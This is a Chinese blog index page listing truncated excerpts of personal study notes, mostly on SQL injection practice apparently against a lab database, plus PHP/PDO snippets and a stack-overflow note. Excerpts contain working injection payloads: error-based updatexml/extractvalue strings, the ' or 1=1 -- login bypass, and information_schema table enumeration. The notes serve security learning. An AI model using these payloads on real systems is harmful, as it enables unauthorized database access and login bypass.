摘要: 西南交通大学 信息科学与技术学院2024年硕士研究生拟录取名单(不含联合培养专项https://sist.swjtu.edu.cn/attached/2024/03/29/9dbec4e4-20a7-4da5-8f22-568a5a3445a3.pdf 全国网络空间安全专业大学排名榜(2024年最新 阅读全文
posted @ 2024-06-04 17:19 hacker-dreamer 阅读(10) 评论(0) 推荐(0) 编辑
摘要: <?php namespace app\controller; use app\BaseController; use think\facade\Db; class Index extends BaseController { public function index13(){ #$query=D 阅读全文
posted @ 2024-04-24 20:36 hacker-dreamer 阅读(19) 评论(0) 推荐(0) 编辑
摘要: <?php $dsn = "mysql:dbname=phpblog;host=127.0.0.1"; # $PDO为 pdo基类的实例 $pdo = new PDO($dsn,'root','root'); #1.如果不根据用户传过来的值进行操作,可以直接query sql $sql = "sel 阅读全文
posted @ 2024-04-11 02:42 hacker-dreamer 阅读(8) 评论(0) 推荐(1) 编辑
摘要: 1' and updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1)# 1' and extractvalue(1,concat(0x7e,user(),0x7e,database())) # SQL注入实战之报错注入篇(u 阅读全文
posted @ 2024-04-01 16:49 hacker-dreamer 阅读(12) 评论(0) 推荐(0) 编辑
摘要: select group_concat(table_name) from information_schema.tables where table_schema=database(); ## 查看表名 ## student, user, passwd select group_concat(col 阅读全文
posted @ 2024-04-01 16:02 hacker-dreamer 阅读(5) 评论(0) 推荐(0) 编辑
摘要: #1.万能注入 'or 1=1 -- '#select * from users where username=' ' or 1=1 -- 'and password='admin4' #一·数字型注入判断#1.?id=1'#select * from users where id=1';数字型则报 阅读全文
posted @ 2024-03-27 00:25 hacker-dreamer 阅读(7) 评论(0) 推荐(0) 编辑
摘要: 这个报错通常是因为在 UPDATE 语句中使用了子查询,并且子查询中引用了待更新的目标表(例如 'users' 表)。这会导致 MySQL 报错,因为 MySQL 不允许在子查询中直接引用待更新的目标表,以防止出现不确定的结果。 以下是一个示例和可能的报错原因: sql -- 尝试更新 'users 阅读全文
posted @ 2024-03-27 00:23 hacker-dreamer 阅读(806) 评论(0) 推荐(0) 编辑
摘要: #1.万能注入 'or 1=1 -- '#select * from users where username=' ' or 1=1 -- 'and password='admin4' #一·数字型注入判断#1.?id=1'#select * from users where id=1';数字型则报 阅读全文
posted @ 2024-03-25 15:51 hacker-dreamer 阅读(100) 评论(0) 推荐(0) 编辑
摘要: use security;#()绕过空格,查表#way1:union子查询select id,username,password from users where id=1 or 1=1 union(select 2,(select (group_concat(table_name))from(in 阅读全文
posted @ 2024-03-22 10:29 hacker-dreamer 阅读(20) 评论(0) 推荐(0) 编辑
摘要: ebp是函数调用栈的尾指针,大小为4个字节 但是需要注意的是,由于在计算机内存中,每个值都是按照字节存储的。一般情况下都是采用小端存储,即 0x0804843B 在内存中的形式是 \x3b\x84\x04\x08 但是,我们又不能直接在终端将这些字符给输入进去,在终端输入的时候 \,x 等也算一个单 阅读全文
posted @ 2024-03-19 01:43 hacker-dreamer 阅读(19) 评论(0) 推荐(0) 编辑